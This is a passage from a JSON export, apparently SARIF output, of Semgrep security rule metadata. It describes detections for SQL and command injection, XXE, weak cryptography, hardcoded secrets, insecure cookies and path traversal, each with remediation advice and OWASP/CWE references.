[https://pkg.go.dev/github.com/go-pg/pg/v10](https://pkg.go.dev/github.com/go-pg/pg/v10)\n","text":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'"},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.sqli.pg-sqli.pg-sqli","id":"go.lang.security.audit.sqli.pg-sqli.pg-sqli","name":"go.lang.security.audit.sqli.pg-sqli.pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.sqli.pg-sqli.pg-sqli"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family."},"help":{"markdown":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.system-command.dont-call-system.dont-call-system)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.system-command.dont-call-system.dont-call-system","id":"cpp.lang.security.system-command.dont-call-system.dont-call-system","name":"cpp.lang.security.system-command.dont-call-system.dont-call-system","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.system-command.dont-call-system.dont-call-system"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security."},"help":{"markdown":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.insecure-uuid-version.insecure-uuid-version)\n - [https://www.landh.tech/blog/20230811-sandwich-attack/](https://www.landh.tech/blog/20230811-sandwich-attack/)\n","text":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security."},"helpUri":"https://semgrep.dev/r/python.lang.security.insecure-uuid-version.insecure-uuid-version","id":"python.lang.security.insecure-uuid-version.insecure-uuid-version","name":"python.lang.security.insecure-uuid-version.insecure-uuid-version","properties":{"precision":"very-high","tags":["CWE-330: Use of Insufficiently Random Values","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.insecure-uuid-version.insecure-uuid-version"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request)\n - [https://owasp.org/www-community/attacks/Command_Injection](https://owasp.org/www-community/attacks/Command_Injection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)\n - [https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection)\n - [https://www.securecodewarrior.com/blog/coders-conquer-security-share-learn-series-os-command-injection](https://www.securecodewarrior.com/blog/coders-conquer-security-share-learn-series-os-command-injection)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fdata_handling~2Finjection~2Foscmd](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fdata_handling~2Finjection~2Foscmd)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","id":"java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","name":"java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"help":{"markdown":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","id":"swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","name":"swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml."},"helpUri":"https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","id":"python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","name":"python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Oracle update is not restricted in $F()"},"help":{"markdown":"Oracle update is not restricted in $F()\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control)\n - [https://medium.com/immunefi/sense-finance-access-control-issue-bugfix-review-32e0c806b1a0](https://medium.com/immunefi/sense-finance-access-control-issue-bugfix-review-32e0c806b1a0)\n","text":"Oracle update is not restricted in $F()"},"helpUri":"https://semgrep.dev/r/solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","id":"solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","name":"solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible."},"help":{"markdown":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.do-privileged-use.do-privileged-use)\n - [https://docs.oracle.com/javase/8/docs/technotes/guides/security/doprivileged.html](https://docs.oracle.com/javase/8/docs/technotes/guides/security/doprivileged.html)\n - [https://wiki.sei.cmu.edu/confluence/display/java/Privilege+Escalation](https://wiki.sei.cmu.edu/confluence/display/java/Privilege+Escalation)\n - [http://phrack.org/papers/escaping_the_java_sandbox.html](http://phrack.org/papers/escaping_the_java_sandbox.html)\n","text":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible."},"helpUri":"https://semgrep.dev/r/java.lang.security.do-privileged-use.do-privileged-use","id":"java.lang.security.do-privileged-use.do-privileged-use","name":"java.lang.security.do-privileged-use.do-privileged-use","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.do-privileged-use.do-privileged-use"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","id":"python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","name":"python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli)\n - [https://www.npmjs.com/package/mssql](https://www.npmjs.com/package/mssql)\n","text":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`"},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","id":"javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","name":"javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.tainted-sql-string.tainted-sql-string)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql)\n - [https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm](https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.tainted-sql-string.tainted-sql-string","id":"python.flask.security.injection.tainted-sql-string.tainted-sql-string","name":"python.flask.security.injection.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation."},"help":{"markdown":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.requests.security.disabled-cert-validation.disabled-cert-validation)\n - [https://stackoverflow.com/questions/41740361/is-it-safe-to-disable-ssl-certificate-verification-in-pythonss-requests-lib](https://stackoverflow.com/questions/41740361/is-it-safe-to-disable-ssl-certificate-verification-in-pythonss-requests-lib)\n","text":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation."},"helpUri":"https://semgrep.dev/r/python.requests.security.disabled-cert-validation.disabled-cert-validation","id":"python.requests.security.disabled-cert-validation.disabled-cert-validation","name":"python.requests.security.disabled-cert-validation.disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.requests.security.disabled-cert-validation.disabled-cert-validation"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content."},"help":{"markdown":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crlf-injection-logs.crlf-injection-logs)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","id":"java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","name":"java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","properties":{"precision":"very-high","tags":["CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crlf-injection-logs.crlf-injection-logs"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself."},"help":{"markdown":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","id":"java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","name":"java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","id":"java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","name":"java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files."},"help":{"markdown":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","id":"ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","name":"ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'"},"help":{"markdown":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag)\n - [https://owasp.org/www-community/controls/SecureCookieAttribute](https://owasp.org/www-community/controls/SecureCookieAttribute)\n","text":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","id":"java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","name":"java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-path-traversal.laravel-path-traversal)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#path-traversal](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#path-traversal)\n","text":"The 